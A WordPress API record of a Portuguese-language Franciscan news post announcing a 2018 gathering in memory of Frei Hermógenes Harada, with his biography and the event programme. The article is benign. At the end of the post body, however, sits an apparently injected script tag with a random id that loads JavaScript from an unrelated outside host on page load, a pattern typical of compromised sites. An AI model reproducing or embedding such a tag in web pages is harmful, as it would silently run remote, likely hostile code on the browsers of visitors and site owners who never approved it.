{"id":165886,"date":"2018-07-01T22:42:37","date_gmt":"2018-07-02T01:42:37","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=165886"},"modified":"2019-08-19T11:13:23","modified_gmt":"2019-08-19T14:13:23","slug":"encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html","title":{"rendered":"Encontro celebra 10 anos da morte de Frei Harada"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignnone wp-image-192300 size-full\" src=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada.jpg\" alt=\"\" width=\"890\" height=\"500\" srcset=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada.jpg 890w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada-450x253.jpg 450w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada-768x431.jpg 768w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada-150x84.jpg 150w\" sizes=\"(max-width: 890px) 100vw, 890px\" \/><\/p>\n<p><strong>Frei Augusto Luiz Gabriel<\/strong><\/p>\n<p><strong>Rondinha (PR) \u2013<\/strong> O Convento S\u00e3o Boaventura de Rondinha, localizado na cidade de Campo Largo (PR), recebe de hoje a 3 de julho o Encontro Celebrativo em mem\u00f3ria de Frei Herm\u00f3genes Harada, frade franciscano e professor de Filosofia desta Prov\u00edncia da Imaculada Concei\u00e7\u00e3o, que faleceu no dia 21 de maio de 2009. Fil\u00f3sofo e m\u00edstico, Frei Harada tinha seguidores no Brasil e no exterior. Aproximadamente 50 participantes est\u00e3o inscritos para este evento que conta com a assessoria e organiza\u00e7\u00e3o de Frei Dorvalino Fassini e do professor universit\u00e1rio Marcos Aur\u00e9lio Fernandes.<\/p>\n<p>O objetivo do encontro \u00e9 celebrar os 90 anos do nascimento de Frei Harada (1928-2018) e tamb\u00e9m abrir as celebra\u00e7\u00f5es, com dura\u00e7\u00e3o de um ano, pelos 10 anos da morte de Frei Herm\u00f3genes (2009-2019). Segundo Frei Dorvalino, o evento n\u00e3o se limita\u00a0 a estes dias de encontro: \u201c\u00c9 para surgir sementes de outras iniciativas, para levar adiante o legado que Frei Herm\u00f3genes nos deixou. Todos n\u00f3s sabemos que a mem\u00f3ria \u00e9 muito importante em nossa vida\u201d, disse o frade na abertura do encontro deste domingo, 1\u00ba de julho, \u00e0s 20 horas.<\/p>\n<p>\u201cA import\u00e2ncia de n\u00e3o ser \u00e9 maior do que a do ser\u201d \u00e9 o lema do evento. Para estes dias foi preparado um cronograma que conta com a participa\u00e7\u00e3o do secret\u00e1rio da CNBB, Dom Frei Leonardo Steiner, o qual conheceu e conviveu com Frei Harada e ir\u00e1 falar sobre \u201cO encontro com Jesus Cristo e seu seguimento\u201d. Tamb\u00e9m est\u00e1 previsto o lan\u00e7amento do livro: &#8220;Fragmentos de um di\u00e1rio de Frei Herm\u00f3genes Harada&#8221;, organizado pela Irm\u00e3 Luci Fontenelle e Frei Dorvalino.<\/p>\n<p>Al\u00e9m disso, nesta segunda-feira (02\/07), os participantes ser\u00e3o brindados com os \u2018testemunhos da hist\u00f3ria de uma alma\u2019, ou seja, depoimentos de pessoas que conviveram com o frade. Frei Gamaliel Devigili tamb\u00e9m apresentar\u00e1 o tema: \u201cUma experi\u00eancia do ressurgimento do pensamento franciscano contido nas Fontes Franciscanas\u201d.<\/p>\n<p>Na ter\u00e7a-feira (03\/04), o professor Marcos Aur\u00e9lio apresentar\u00e1 o tema \u201ca atividade reflexiva de Frei Herm\u00f3genes\u201d, baseado num texto do professor Carneiro Le\u00e3o. Em seguida, S\u00e9rgio Wrublevski, abordar\u00e1 o tema sobre \u201cA quest\u00e3o de Deus e a fenomenologia (Schelling \/ Heidegger). Tamb\u00e9m est\u00e1 previsto um momento celebrativo junto ao t\u00famulo de Frei Harada, que fica no cemit\u00e9rio interno do Convento, para encerrar o evento.<\/p>\n<p>Frei Herm\u00f3genes Harada nasceu em Miyasaki, Jap\u00e3o, no dia 2 de outubro de 1928. Seus pais eram budistas convertidos ao cristianismo protestante. Em 1936, Harada veio para o Brasil. Foi ent\u00e3o que decidiu ser religioso franciscano. Estudou no Semin\u00e1rio Ser\u00e1fico de S\u00e3o Lu\u00eds de Tolosa, em Rio Negro, no Paran\u00e1 onde cursou o Juvenato. Em 1949, foi admitido na Ordem Franciscana ao ingressar no Noviciado de Rodeio desta Prov\u00edncia da Imaculada Concei\u00e7\u00e3o . Depois fez os estudos de Filosofiam, em Curitiba (PR), e Teologia, em Petr\u00f3polis (RJ).\u00a0 Est\u00e1 sepultado no cemit\u00e9rio do Convento S\u00e3o Boaventura em Campo Largo (PR).<\/p>\n<h3>VEJA A PROGRAMA\u00c7\u00c3O COMPLETA<\/h3>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-166067\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/07\/convite-8301-1.jpg\" alt=\"convite-8301 (1)\" width=\"830\" height=\"1112\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Encontro Celebrativo <\/p>\n","protected":false},"author":5,"featured_media":192302,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[451,586],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Encontro celebra 10 anos da morte de Frei Harada - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Encontro celebra 10 anos da morte de Frei Harada - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Encontro Celebrativo\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-02T01:42:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-08-19T14:13:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada_1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"330\" \/>\n\t<meta property=\"og:image:height\" content=\"219\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"freiaugusto\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"freiaugusto\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada_1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada_1.jpg\",\"width\":330,\"height\":219},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html\",\"name\":\"Encontro celebra 10 anos da morte de Frei Harada - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#primaryimage\"},\"datePublished\":\"2018-07-02T01:42:37+00:00\",\"dateModified\":\"2019-08-19T14:13:23+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Encontro celebra 10 anos da morte de Frei Harada\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\",\"name\":\"freiaugusto\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"caption\":\"freiaugusto\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Encontro celebra 10 anos da morte de Frei Harada - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html","og_locale":"pt_BR","og_type":"article","og_title":"Encontro celebra 10 anos da morte de Frei Harada - Not\u00edcias - Franciscanos","og_description":"Encontro Celebrativo","og_url":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-07-02T01:42:37+00:00","article_modified_time":"2019-08-19T14:13:23+00:00","og_image":[{"width":330,"height":219,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada_1.jpg","type":"image\/jpeg"}],"author":"freiaugusto","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"freiaugusto","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada_1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_harada_1.jpg","width":330,"height":219},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html","name":"Encontro celebra 10 anos da morte de Frei Harada - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#primaryimage"},"datePublished":"2018-07-02T01:42:37+00:00","dateModified":"2019-08-19T14:13:23+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-celebrativo-em-memoria-de-frei-harada-comeca-hoje.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Encontro celebra 10 anos da morte de Frei Harada"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91","name":"freiaugusto","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","caption":"freiaugusto"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/165886"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=165886"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/165886\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/192302"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=165886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=165886"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=165886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}